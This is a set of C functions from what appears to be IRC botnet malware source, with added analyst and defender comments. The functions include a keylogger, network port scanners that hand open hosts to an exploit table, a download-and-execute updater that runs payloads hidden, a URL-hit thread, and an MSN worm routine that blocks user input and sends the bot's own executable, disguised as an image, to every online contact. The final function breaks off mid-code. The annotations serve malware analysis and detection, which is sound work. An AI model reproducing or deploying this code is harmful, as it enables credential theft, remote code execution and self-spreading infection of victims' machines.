Exemple #1
// Analyst note: bot worker thread that runs the "secure"/"unsecure" host
// routines. param points at an NTHREAD owned by the spawning thread.
// RemoveVirus, SecureServices, SecureRegistry, SecureShares and
// SearchForPrivilegedAccounts are defined elsewhere, so what they change on
// the host is not visible in this listing.
// Defender view: the status strings in the one-shot branch show the
// SeNetworkLogonRight assignment in local system policy being edited.
// User-right changes of that kind are recorded by Windows policy-change
// auditing (events 4717/4718) when that audit category is enabled.
DWORD WINAPI SecureThread(LPVOID param)
{
	// Take a private copy of the request, then set gotinfo on the caller's
	// struct (presumably the spawner waits on this flag -- confirm).
	NTHREAD secure = *((NTHREAD*)param);
	NTHREAD *secures = (NTHREAD *)param;
	secures->gotinfo = TRUE;

	if (secure.bdata2) //loop
	{
		// Loop mode: re-runs every routine with a NULL IRC handle each
		// SECURE_DELAY milliseconds. This loop has no exit condition.
		while (1)
		{
			// noadvapi32 presumably flags that advapi32.dll could not be loaded
			// (the commented-out message near the end of the function says so).
			if (!noadvapi32)
			{
#ifndef NO_VIRUSREMOVE
				RemoveVirus(0,NULL,TRUE,TRUE,FALSE);
#endif
				SecureServices(NULL, 0, TRUE, FALSE, TRUE);
				SecureRegistry(TRUE, NULL, 0, TRUE, FALSE, TRUE);
				SecureShares(TRUE, NULL, 0, TRUE, FALSE, TRUE);

#ifndef NO_LSARESTRICT
				if (!noadvapi32lsa)
					SearchForPrivilegedAccounts(L"SeNetworkLogonRight",FALSE);
#endif
			}
			//WriteHostsFile(secure.secure, secure.sock, secure.chan, secure.notice, secure.silent, secure.verbose, secure.loop);
			Sleep(SECURE_DELAY);
		}
	}
	else
	{
		// One-shot mode: bdata1 selects secure (TRUE) or unsecure (FALSE), as the
		// sec_title/unsec_title choice in the messages shows. Results are sent
		// to secure.target over the IRC connection.
		IRC* irc=(IRC*)secure.conn;
		if (!noadvapi32)
		{
			if (secure.bdata1)
			{
				SecureServices(irc,secure.target,secure.silent,secure.verbose,FALSE);
#ifndef NO_VIRUSREMOVE
				//RemoveVirus(secure.target,irc,FALSE,secure.silent,secure.verbose);
#endif
			}

#ifndef NO_LSARESTRICT
			if (!noadvapi32lsa) {
				DWORD dwRet;
				// The second argument is the inverse of bdata1. From the message
				// text, securing removes the right from accounts and unsecuring
				// adds it back; dwRet is reported as the number of accounts.
				if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight",(secure.bdata1?FALSE:TRUE))) > 0)
					irc->privmsg(secure.target,"%s %s SeNetworkLogonRights %s %d accounts in local system policy.", (secure.bdata1?sec_title:unsec_title), (secure.bdata1?"Removed":"Added"), (secure.bdata1?"from":"to"),dwRet);
				else
					irc->privmsg(secure.target,"%s Failed to %s SeNetworkLogonRights %s accounts in local system policy.",(secure.bdata1?sec_title:unsec_title),(secure.bdata1?"remove":"restore"),(secure.bdata1?"from any":"to"));
			}
#endif

			SecureRegistry(secure.bdata1,irc,secure.target,secure.silent,secure.verbose,FALSE);
			SecureShares(secure.bdata1,irc,secure.target,secure.silent,secure.verbose,FALSE);
		}
			
	}

/*
		} else {
//			sprintf(sendbuf,"%s Advapi32.dll could not be loaded, %s could not be %s.",(secure.secure?sec_title:unsec_title),(secure.secure?"registry, shares, and services":"registry and shares"),(secure.secure?"secured":"unsecured"));
//			if (!secure.silent) irc_privmsg(secure.sock,secure.chan,sendbuf,secure.notice);
//			addlog(sendbuf);
		}
//		WriteHostsFile(secure.secure, secure.sock, secure.chan, secure.notice, secure.silent, secure.verbose, secure.loop);
	}
*/
	// Release this thread's slot in the bot's thread table before exiting.
	clearthread(secure.threadnum);
	ExitThread(0);
}
Exemple #2
// Analyst note: keystroke-capture thread. Every 8 ms it polls the foreground
// window and the first 92 entries of the `keys` table (defined elsewhere),
// rebuilds typed text in `buffer`, and passes it to SaveKeys() tagged with the
// window title when the focused window changes, when Return is released, or
// when the buffer nears its limit. SaveKeys is not shown, so the destination
// of the captured text is not visible in this listing.
// Defender view: the observable behaviour is continuous polling of
// GetAsyncKeyState / GetKeyState / GetForegroundWindow / GetWindowText through
// f-prefixed pointers (presumably resolved at run time -- confirm). Polling
// the whole key table at this rate from a process with no UI role is what
// API-monitoring keylogger heuristics look for.
DWORD WINAPI KeyLoggerThread(LPVOID param)
{
	// Private copy of the request; gotinfo is set on the caller's struct.
	KEYLOG keylog = *((KEYLOG *)param);
	KEYLOG *keylogs = (KEYLOG *)param;
	keylogs->gotinfo = TRUE;

	char buffer[IRCLINE], buffer2[IRCLINE], windowtxt[61];

	// bKstate[vk] remembers how a key was pressed (1-4, see below) until it is released.
	int err = 0, x = 0, i = 0, state, shift, bKstate[256]={0};

	HWND active = fGetForegroundWindow();
	HWND old = active;
	fGetWindowText(old,windowtxt,60);

	// Runs until SaveKeys returns non-zero.
	while (err == 0) {
		Sleep(8);

		// Focus change: flush what was typed so far, tagged with the new window title.
		active = fGetForegroundWindow();
		if (active != old) {
			old = active;
			fGetWindowText(old,windowtxt,60);

			sprintf(buffer2, "%s (Changed Windows: %s)", buffer, windowtxt); 
			err = SaveKeys(buffer2, keylog);
			memset(buffer,0,sizeof(buffer));
			memset(buffer2,0,sizeof(buffer2));
		}

		for (i = 0; i < 92; i++) {
			shift = fGetKeyState(VK_SHIFT);

			// inputL is used as the virtual-key code to poll.
			x = keys[i].inputL;

			// 0x8000: high bit of GetAsyncKeyState is set while the key is down.
			// The range 65..90 is the virtual-key range for A-Z.
			if (fGetAsyncKeyState(x) & 0x8000) {
				if (((fGetKeyState(VK_CAPITAL)) && (shift > -1) && (x > 64) && (x < 91)))//caps lock and NOT shift
					bKstate[x] = 1; /* upercase a-z */
				else if (((fGetKeyState(VK_CAPITAL)) && (shift < 0) && (x > 64) && (x < 91)))//caps lock AND shift
					bKstate[x] = 2; /* lowercase a-z */
				else if (shift < 0) /* shift */
					bKstate[x] = 3; /* upercase */
				else bKstate[x] = 4; /* lowercase */
			} else {
				// Key is up: if it was recorded as down, treat this as the release
				// and emit the character once.
				if (bKstate[x] != 0) {
					state = bKstate[x];
					bKstate[x] = 0;
	
					// 8 is VK_BACK: drop the last captured character.
					if (x == 8) {
						buffer[strlen(buffer)-1] = 0;
						continue;
					} else if (strlen(buffer) > 511 - 70) {
						// Buffer nearly full: flush with the current window title.
						active = fGetForegroundWindow();
						fGetWindowText(active,windowtxt,60);
					
						sprintf(buffer2,"%s (Buffer full) (%s)",buffer,windowtxt);
						err = SaveKeys(buffer2, keylog);
						memset(buffer,0,sizeof(buffer));
						memset(buffer2,0,sizeof(buffer2));

						continue;
					} else if (x == 13) {
						// 13 is VK_RETURN: flush the completed line, if any.
						if (strlen(buffer) == 0) 
							continue;

						active = fGetForegroundWindow();
						fGetWindowText(active,windowtxt,60);

						sprintf(buffer2,"%s (Return) (%s)",buffer,windowtxt);
						err = SaveKeys(buffer2,keylog);
						memset(buffer,0,sizeof(buffer));
						memset(buffer2,0,sizeof(buffer2));

						continue;
					} else if (state == 1 || state == 3) 
						strcat(buffer,keys[i].outputH);
					else if (state == 2 || state == 4) 
						strcat(buffer,keys[i].outputL);
				}
			}
		}
	}
	clearthread(keylog.threadnum);

	ExitThread(0);
}
Exemple #3
// Analyst note: scanner sub-thread. While the parent scan's advinfo[].info
// flag is set, it takes the next address (random or sequential), probes
// scan.port with AdvPortOpen, and either reports the open port to the IRC
// channel (scan.exploit == -1) or passes the host to the routine stored at
// exploit[scan.exploit].exfunc. AdvGetNextIP*, AdvPortOpen and the exploit
// table are defined elsewhere and are not visible in this listing.
// Defender view: each sub-thread pauses 2 s between probes. On the wire this
// is a steady stream of connection attempts to one destination port across
// many addresses, the pattern horizontal-scan detections key on.
DWORD WINAPI AdvPortScanner(LPVOID param)
{
	IN_ADDR in;
	char logbuf[LOGLINE];

	// Private copy of the request passed by the spawning thread.
	ADVSCAN scan = *((ADVSCAN *)param);
	//ADVSCAN *scanp = (ADVSCAN *)param;
	//scanp->cgotinfo = TRUE;

	DWORD threadnum=scan.cthreadnum;
	DWORD threadid=scan.cthreadid;

	srand(GetTickCount()); 
	// The parent's info flag is the stop signal for all of its sub-threads.
	while (advinfo[threads[threadnum].parent].info) {
		DWORD dwIP;
		
		if (scan.random)
			dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
		else
			dwIP = AdvGetNextIP(threads[threadnum].parent);
		in.s_addr = dwIP;

		// The thread-table name is rewritten on every probe with the current target.
		sprintf(logbuf,"[scan]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.", 
			finet_ntoa(in), scan.port, threads[threadnum].parent, threadid); 
		sprintf(threads[threadnum].name, logbuf);

		if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
			if (scan.exploit == -1) {
				// Report-only mode; the critical section serialises IRC and log
				// output across the sub-threads.
				EnterCriticalSection(&CriticalSection); 

				sprintf(logbuf,"[scan]: IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
				irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
				addlog(logbuf);

				LeaveCriticalSection(&CriticalSection);
			} else {
				// Hand the responsive host to the selected entry of the exploit
				// table, together with the IRC reporting details.
				EXINFO exinfo;

				sprintf(exinfo.ip, finet_ntoa(in));
				sprintf(exinfo.chan, scan.chan);
				exinfo.sock = scan.sock;
				exinfo.notice = scan.notice;
				exinfo.silent = scan.silent;
				exinfo.port = scan.port;
				exinfo.threadnum = threadnum;
				exinfo.exploit = scan.exploit;
				exploit[scan.exploit].exfunc(exinfo);
				/*if (exploit[scan.exploit].exfunc(exinfo)) {
					EnterCriticalSection(&CriticalSection); 

					sprintf(logbuf,"[scan]: Finished with IP: %s, Port %d.",finet_ntoa(in),scan.port);
					irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
					addlog(logbuf);
	
					LeaveCriticalSection(&CriticalSection);
				} else {
					EnterCriticalSection(&CriticalSection); 

					sprintf(logbuf,"[scan]: Failed to exploit IP: %s, Port %d.",finet_ntoa(in),scan.port);
					irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
					addlog(logbuf);
	
					LeaveCriticalSection(&CriticalSection);
				}*/

			}
		}
		Sleep(2000);
	}
	clearthread(threadnum);

	ExitThread(0);
}
Exemple #4
// Analyst note: parent thread of a scan job. It records the start address in
// advinfo[], calls CheckServers (not shown), starts scan.threads
// AdvPortScanner sub-threads 50 ms apart, then waits scan.minutes minutes (or,
// when that is 0, until advinfo[].info is cleared) before announcing
// completion over IRC and clearing the flag the sub-threads poll.
// Defender view: thread count, port and duration all arrive in the ADVSCAN
// request, so scan volume from an infected host can differ between runs.
// Rate-based scan detection should not assume a fixed fan-out.
DWORD WINAPI AdvScanner(LPVOID param)
{
	char buffer[LOGLINE], szSelfExe[MAX_PATH];

	// Private copy of the request; gotinfo is set on the caller's struct.
	ADVSCAN scan = *((ADVSCAN *)param);
	ADVSCAN *scanp = (ADVSCAN *)param;
	scanp->gotinfo = TRUE;
	advinfo[scan.threadnum].ip = finet_addr(scan.ip);
/*
	// FIX ME: Make this a standalone function
	if (!FileExists(szLocalPayloadFile)) {
		GetModuleFileName(0,szSelfExe,MAX_PATH);
		CopyFile(szSelfExe,szLocalPayloadFile,FALSE);
		// FIX ME: Make this copy to the same directory (could affect other stuff)
	}
*/
	CheckServers(scan);

	// findthreadid(SCAN_THREAD) == 1 presumably means this is the only scan job
	// running (confirm against findthreadid); only then is the shared critical
	// section (re)initialised.
	if (findthreadid(SCAN_THREAD) == 1) {
		DeleteCriticalSection(&CriticalSection); // just in case

		if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
			// failed to initialize CriticalSection
			sprintf(buffer,"[scan]: Failed to initialize critical section.");
			if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
			addlog(buffer);

			return 0;
		}
	}

	// Setting info = TRUE is what keeps the sub-threads' scan loops running.
	advinfo[scan.threadnum].info = TRUE;
	for (unsigned int i=1;i<=(scan.threads);i++) {
		scan.cthreadid = i;
		sprintf(buffer,"[scan]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); 
		scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
		threads[scan.cthreadnum].parent = scan.threadnum;
		threads[scan.cthreadnum].port = scan.port;
		threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(void *)&scan,0,0);
		Sleep(50);
	}

	// Timed scan: sleep for the requested minutes. Otherwise poll until some
	// other code clears the info flag.
	if (scan.minutes != 0)
		Sleep(60000*scan.minutes);
	else 
		while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);

	IN_ADDR in;
	in.s_addr = advinfo[scan.threadnum].ip;
	sprintf(buffer,"[scan]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
	if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
	addlog(buffer);

	// Clear the flag and give the sub-threads 3 s to observe it.
	advinfo[scan.threadnum].info = FALSE;
	Sleep(3000);

	if (findthreadid(SCAN_THREAD) == 1) 
		DeleteCriticalSection(&CriticalSection);

	clearthread(scan.threadnum);

	ExitThread(0);
}
Exemple #5
// Analyst note: issues a single HTTP request through WinINet to a URL supplied
// in the request (visit.host), with a Referer also supplied in the request
// (visit.referer), then reports the outcome over IRC. The response body is
// never read. The purpose is presumably hit/traffic generation; this code does
// not establish that.
// Defender view: the request is sent with INTERNET_FLAG_NO_UI from whatever
// process hosts the bot. Proxy or EDR telemetry showing WinINet HTTP requests
// from a process with no browsing role is the signal to look for.
DWORD WINAPI VisitThread(LPVOID param)
{
	HINTERNET ch = 0, req = 0;

	const char *accept = "*/*";
	char vhost[128], vuser[128], vpass[128], vpath[256], sendbuf[IRCLINE];

	// Private copy of the request; gotinfo is set on the caller's struct.
	VISIT visit = *((VISIT *)param);
	VISIT *visits = (VISIT *)param;
	visits->gotinfo = TRUE;

	// zero out string varaiables
	memset(vhost, 0, sizeof(vhost));
	memset(vuser, 0, sizeof(vuser));
	memset(vpass, 0, sizeof(vpass));
	memset(vpath, 0, sizeof(vpath));

	// zero out url structure and set options
	// (non-zero length fields with NULL buffers ask InternetCrackUrl to return
	// pointers into the original URL string instead of copying)
	URL_COMPONENTS url;
	memset(&url, 0, sizeof(url));
	url.dwStructSize = sizeof(url);
	url.dwHostNameLength = 1;
    url.dwUserNameLength = 1;
    url.dwPasswordLength = 1;
    url.dwUrlPathLength = 1;

	do {
		// crack the url (break it into its main parts)
		if (!fInternetCrackUrl(visit.host, strlen(visit.host), 0, &url)) {
			sprintf(sendbuf,"[VISIT]: Invalid URL.");
			break;
		}

		// copy url parts into variables
		if (url.dwHostNameLength > 0) 
			strncpy(vhost, url.lpszHostName, url.dwHostNameLength);
		unsigned short vport = url.nPort;
		if (url.dwUserNameLength > 0) 
			strncpy(vuser, url.lpszUserName, url.dwUserNameLength);
		if (url.dwPasswordLength > 0) 
			strncpy(vpass, url.lpszPassword, url.dwPasswordLength);
		if (url.dwUrlPathLength > 0) 
			strncpy(vpath, url.lpszUrlPath, url.dwUrlPathLength);

		// ih is a WinINet session handle opened elsewhere in the program.
		ch = fInternetConnect(ih, vhost,vport, vuser, vpass, INTERNET_SERVICE_HTTP, 0, 0);
		if (ch == NULL) {
			sprintf(sendbuf,"[VISIT]: Could not open a connection.");
			break;
		}

		// A NULL verb makes WinINet issue a GET; the Referer header comes from the request.
		req = fHttpOpenRequest(ch, NULL, vpath, NULL, visit.referer, &accept, INTERNET_FLAG_NO_UI, 0);
		if (req == NULL) {
			sprintf(sendbuf,"[VISIT]: Failed to connect to HTTP server.");
			break;
		}

		if (fHttpSendRequest(req, NULL, 0, NULL, 0))
			sprintf(sendbuf,"[VISIT]: URL visited.");
		else
			sprintf(sendbuf,"[VISIT]: Failed to get requested URL from HTTP server.");		
	} while(0); // always false, so this never loops, only helps make error handling easier

	// Every path above leaves a status line in sendbuf, which is reported and logged here.
	if (!visit.silent) irc_privmsg(visit.sock, visit.chan, sendbuf, visit.notice);
	addlog(sendbuf);

	fInternetCloseHandle(ch);
	fInternetCloseHandle(req);

	clearthread(visit.threadnum);

	ExitThread(0);
}
Exemple #6
// function for downloading files/updating
// Analyst note: fetches dl.url through WinINet into dl.dest, optionally
// passing each chunk through Xorbuff (not shown) before it is written, checks
// the result against an expected length and CRC when those are supplied, and
// then either opens the file (dl.run) or, for an update, starts it hidden and
// detached and terminates the current instance after calling uninstall().
// Defender view: the sequence is a network fetch, a file write, then a process
// start from the same process. When dl.encrypted is set, the bytes on the wire
// differ from the bytes on disk, so network payload signatures and on-disk
// hashes will not match each other.
DWORD WINAPI DownloadThread(LPVOID param)
{
	char buffer[IRCLINE];
	DWORD r, d, start, total, speed;

	// Private copy of the request; gotinfo is set on the caller's struct.
	DOWNLOAD dl = *((DOWNLOAD *)param);
	DOWNLOAD *dls = (DOWNLOAD *)param;
	dls->gotinfo = TRUE;

	// ih is a WinINet session handle opened elsewhere in the program.
	HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
	if (fh != NULL) {
		// open the file
		HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
		// make sure that our file handle is valid
		if (f < (HANDLE)1) {
			sprintf(buffer,"[DOWNLOAD]: Cant Open File: %s.",dl.dest);
			if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
			addlog(buffer);

			clearthread(dl.threadnum);

			ExitThread(0);;
		}

		total = 0;
		start = GetTickCount();

		// Side buffer holding up to the first 512000 bytes; its only consumer is
		// the commented-out CRC check further down.
		char *fileTotBuff=(char *)malloc(512000);	//FIX ME: Only checks first 500 kb
		do {
			memset(buffer, 0, sizeof(buffer));
			fInternetReadFile(fh, buffer, sizeof(buffer), &r);
			// Transform the chunk before it reaches disk (presumably XOR, going by
			// the helper's name -- Xorbuff is not shown).
			if (dl.encrypted)
				Xorbuff(buffer,r);
			WriteFile(f, buffer, r, &d, NULL);
			
			if ((total) < 512000) {
				//We have free bytes...
				//512000-total
				unsigned int bytestocopy;
				bytestocopy=512000-total;
				if (bytestocopy>r) 
					bytestocopy=r;
				memcpy(&fileTotBuff[total],buffer,bytestocopy);
			}
			total+=r;
			if (dl.filelen) 
				if (total>dl.filelen) 
					break; //er, we have a problem... filesize is too big.
			// Progress is published through the thread-table name.
			if (dl.update != 1) 
				sprintf(threads[dl.threadnum].name, "[DL]: File Download: %s (%dKB transferred).", dl.url, total / 1024);
			else 
				sprintf(threads[dl.threadnum].name, "[DL]: Update: %s (%dKB transferred).", dl.url, total / 1024);
		} while (r > 0);

		BOOL goodfile=TRUE;

		// Length check, only when an expected length was supplied.
		if (dl.filelen) {
			if (total!=dl.filelen) {
				goodfile=FALSE;
				sprintf(buffer,"[DL]: Filesize Is Incorrect: (%d != %d).", total, dl.filelen);
				irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
				addlog(buffer);
			}
		}
		// Bytes per second; the +1 avoids dividing by zero for sub-second transfers.
		speed = total / (((GetTickCount() - start) / 1000) + 1);
		CloseHandle(f);

		/* if (dl.expectedcrc) {
			unsigned long crc,crclength;
			sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
			crclength=total;
			if (crclength>512000) crclength=512000;
			crc=crc32(fileTotBuff,crclength);
			if (crc!=dl.expectedcrc) {
				goodfile=FALSE;
				irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
			}
			
		} */
		free(fileTotBuff);
		
		// CRC check over the written file (crc32f is not shown), only when an
		// expected value was supplied.
		if (dl.expectedcrc) { 
			unsigned long crc=crc32f(dl.dest); 
			if (crc!=dl.expectedcrc) { 
				goodfile=FALSE;
				sprintf(buffer,"[DL]: CRC Failed (%d != %d).", crc, dl.expectedcrc);
				irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); 
				addlog(buffer);
			} 
		} 

		// A failed check skips execution; the file written to dl.dest is not
		// deleted on this path.
		if (goodfile==FALSE) 
			goto badfile;
		
		//download isn't an update
		if (dl.update != 1) {
			sprintf(buffer, "[DL]: Downloaded %.1f KB To %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			// Optional execution through the shell "open" verb, with a visible window.
			if (dl.run == 1) {
				fShellExecute(0, "open", dl.dest, NULL, NULL, SW_SHOW);
				if (!dl.silent) {
					sprintf(buffer,"[DL]: Opened: %s.",dl.dest);
					irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
					addlog(buffer);
				}
			}

		// download is an update
		} else {
			sprintf(buffer, "[DL]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			// The replacement is started with a hidden window and detached from
			// any console.
			PROCESS_INFORMATION pinfo;
			STARTUPINFO sinfo;
			memset(&pinfo, 0, sizeof(pinfo));
			memset(&sinfo, 0, sizeof(sinfo));
			sinfo.lpTitle = "";
			sinfo.cb = sizeof(sinfo);
			sinfo.dwFlags = STARTF_USESHOWWINDOW;
			sinfo.wShowWindow = SW_HIDE;

			if (CreateProcess(NULL, dl.dest, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE) {
				// Hand-over: the running instance calls uninstall() (not shown) and
				// exits, so the parent of the new process disappears right after
				// creating it.
				fWSACleanup();
				uninstall();
				ExitProcess(EXIT_SUCCESS);
			} else {
				sprintf(buffer,"[DL]: Update Failed: Error Executing File: %s.",dl.dest);
				if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
				addlog(buffer);
			}
		}
	} else {
		sprintf(buffer,"[DL]: Not Working: %s.",dl.url);
		if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
		addlog(buffer);
	}

	badfile:
	fInternetCloseHandle(fh);

	clearthread(dl.threadnum);

	ExitThread(0);
}
Exemple #7
// Analyst note: instant-messenger propagation thread. It automates the local
// Messenger client over COM (CLSID_Messenger), walks the contact list, and for
// every contact whose status is not MISTATUS_OFFLINE: calls zip_store with the
// bot's own executable path, opens an IM window to the contact, hides that
// window, and drives it with synthetic keystrokes plus dropfiles2(). Physical
// input is blocked with BlockInput while the contact loop runs. zip_store,
// key_type2, dropfiles2 and to_variant2 are defined elsewhere and not shown.
// Indicators visible in this listing: the path <windir>\temp\gafgatew.tmp and
// the lure name "<local-part of contact address>_023.jpeg-www.myspace.com".
// Defender view: COM activation of the Messenger automation object by a
// non-Messenger process, BlockInput calls, and bursts of keybd_event aimed at
// a hidden IM window are the behaviours to alert on.
DWORD WINAPI MsnFile2(LPVOID param)
{
	// trt counts IM windows driven in this run (global, declared elsewhere).
	trt = 0;

	// Private copy of the request; gotinfo is set on the caller's struct.
	NTHREAD msn2 = *((NTHREAD *)param);
	NTHREAD *msns2 = (NTHREAD *)param;
	msns2->gotinfo = TRUE;
	IRC* irc=(IRC*)msn2.conn;

    /// Naming of the zip file in the Windows directory
	char fakename[] = "gafgatew.tmp";

	// windir becomes <Windows directory>\temp\gafgatew.tmp
	char windir[MAX_PATH];
	GetWindowsDirectory(windir,sizeof(windir));
	strcat(windir, "\\temp\\");
	strcat(windir, fakename);
	IMSNMessenger3 *pIMessenger = NULL;

	CoInitialize(0);

	HRESULT hr = CoCreateInstance(
		CLSID_Messenger,
		NULL,
		CLSCTX_ALL,
		IID_IMSNMessenger2,
		(void**)&pIMessenger);

	// msn2.data1 carries the message text supplied with the request.
	char msnmsg[512];
	char buf[128];
	char msnmsg1[1024];
	strncpy(msnmsg,msn2.data1,sizeof(msnmsg));
     
	if (SUCCEEDED(hr))
	{

		char msg[256];
		IDispatch * dispContacts = NULL;
		pIMessenger->get_MyContacts(&dispContacts);
		if (SUCCEEDED(hr))
		{

			IMSNMessengerContacts *pIMessengerContacts = NULL;
			
			hr = dispContacts->QueryInterface(__uuidof(pIMessengerContacts),(LPVOID*)&pIMessengerContacts);
			if (SUCCEEDED(hr))
			{
				IDispatch * dispContact					= NULL;
				IMSNMessengerContact *pIMessengerContact	= NULL;
				long iContacts;

				hr = pIMessengerContacts->get_Count(&iContacts);
				if (SUCCEEDED(hr))
				{
					// Keyboard and mouse input is blocked for the whole contact
					// loop and restored after it.
					BlockInput(true);
					for (long i = 0; i < iContacts; i++)	
					{
						hr = pIMessengerContacts->raw_Item(i,&dispContact);
						if (SUCCEEDED(hr))
						{
							hr = dispContact->QueryInterface(__uuidof(pIMessengerContact),(LPVOID*)&pIMessengerContact);
							if (SUCCEEDED(hr))
							{
								BSTR szContactName;
								VARIANT vt_user;
								MISTATUS miStatus;
								IDispatch *pIDispatch = NULL;
								IMSNMessengerWindow *pIMessengerWindow;
								LONG wndIM;

								// Offline contacts are skipped.
								hr = pIMessengerContact->get_Status(&miStatus);
								if (SUCCEEDED(hr))
								{
									if (miStatus == MISTATUS_OFFLINE)
									{
										pIMessengerContact->Release();
										dispContact->Release();
										continue;
									}
								}

								/// Message no [email protected] !!!
								// buf receives the contact's sign-in name; msnmsg1 the message text.
								pIMessengerContact->get_SigninName(&szContactName);
								VariantInit( &vt_user );
								to_variant2(szContactName, vt_user);
								_bstr_t tmp = szContactName;
								sprintf(buf, _T("%s"), (LPCTSTR)tmp);
								sprintf(msnmsg1, "%s", msnmsg);
								///

								
								///makes the 'zip' named email_023.jpeg-www.myspace.com
								// The name is personalised per recipient: everything from '@'
								// onward is cut from the sign-in name before the suffix is added.
								char *pemail;
								pemail = strchr(buf, '@');
								if(pemail != NULL) buf[pemail-buf] = NULL;
								strcat(buf, "_023.jpeg-www.myspace.com");
								//
								
								// zip_store receives the running module's own path, the temp
								// path built above and the lure name (argument roles are
								// presumed from the names -- zip_store is not shown).
								char exepath[MAX_PATH];
								GetModuleFileName(NULL, exepath, MAX_PATH);
								zip_store(exepath, windir, buf);
								///



								Sleep(3000);
								hr = pIMessenger->raw_InstantMessage(vt_user,&pIDispatch);
								if (SUCCEEDED(hr))
								{
									hr = pIDispatch->QueryInterface(IID_IMSNMessengerWindow, (void **)&pIMessengerWindow);
									if (SUCCEEDED(hr))
									{
										// The conversation window is focused and then hidden
										// (ShowWindow with 0 is SW_HIDE) before being driven.
										Sleep(10);
										pIMessengerWindow->get_HWND(&wndIM);
										SetForegroundWindow((HWND) wndIM);
										SetFocus((HWND) wndIM);
										trt++;
										ShowWindow((HWND) wndIM,0);										
										srand(GetTickCount());	
										//stats_msg++;
										//send message
                                        key_type2((char *)msnmsg1, (HWND) wndIM);
										keybd_event(VK_CONTROL, 0, KEYEVENTF_EXTENDEDKEY | 0, 0);
                                        keybd_event(VkKeyScan('V'), 0, 0, 0);
                                        keybd_event(VK_CONTROL, 45, KEYEVENTF_EXTENDEDKEY | KEYEVENTF_KEYUP, 0); 
                                        keybd_event(VK_RETURN, 0, 0, 0);
										//send zipfile
										Sleep(50);
										dropfiles2((HWND) wndIM, buf);
                                        keybd_event(VK_CONTROL, 0, KEYEVENTF_EXTENDEDKEY | 0, 0);
                                        keybd_event(VkKeyScan('V'), 0, 0, 0);                                        
										keybd_event(VK_CONTROL, 45, KEYEVENTF_EXTENDEDKEY | KEYEVENTF_KEYUP, 0);
																		
									}
								}
								pIMessengerContact->Release();
								dispContact->Release();
							}
						}
					}
					BlockInput(false);
					// A status line goes to InfoChan only when more than one window was driven.
					if ( trt > 1 )
					{
					irc->pmsg(InfoChan,str_msn_msg2, trx);
					}
					pIMessengerContacts->Release();
				}
				dispContacts->Release();
			}
		}
		pIMessenger->Release();
	}

	CoUninitialize();
	clearthread(msn2.threadnum);
	ExitThread(0);
	

	return 0;
}
Exemple #8
// Analyst note: scanner sub-thread. While the parent scan's advinfo[].info
// flag is set, it takes the next address (random or sequential), probes
// scan.port with AdvPortOpen, and either messages the IRC channel
// (scan.exploit == -1) or passes the host, plus the command string stored in
// the exploit table entry, to exploit[scan.exploit].exfunc. Output goes to
// scan.msgchan when that is non-empty, otherwise to scan.chan. The helpers and
// the exploit table are defined elsewhere and are not visible in this listing.
// Defender view: each sub-thread pauses 2 s between probes. The wire pattern
// is repeated connection attempts to one destination port across many
// addresses, which horizontal-scan detections key on.
DWORD WINAPI AdvPortScanner(LPVOID param)
{
	IN_ADDR in;
	char logbuf[LOGLINE];

	// Private copy of the request; cgotinfo is set on the caller's struct.
	ADVSCAN scan = *((ADVSCAN *)param);
	ADVSCAN *scanp = (ADVSCAN *)param;
	scanp->cgotinfo = TRUE;

	int threadnum=scan.cthreadnum;
	int threadid=scan.cthreadid;

	srand(GetTickCount());
	// The parent's info flag is the stop signal for all of its sub-threads.
	while (advinfo[threads[threadnum].parent].info) {
		DWORD dwIP;

		if (scan.random)
			dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
		else
			dwIP = AdvGetNextIP(threads[threadnum].parent);
		in.s_addr = dwIP;

		//sprintf(logbuf,"scan -- IP: %s:%d, Scan thread: %d, Sub-thread: %d.",
			//finet_ntoa(in), scan.port, threads[threadnum].parent, threadid);
		sprintf(threads[threadnum].name, logbuf);

		if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
		//if (SynPortOpen(finet_addr(GetIP(scan.sock)), dwIP, scan.port, scan.delay) == TRUE) {
			if (scan.exploit == -1) {
				// Report-only mode; the critical section serialises IRC output
				// across the sub-threads.
				EnterCriticalSection(&CriticalSection);

				//sprintf(logbuf,"scan -- IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
				if (!scan.silent) {
					if (scan.msgchan[0] != '\0')
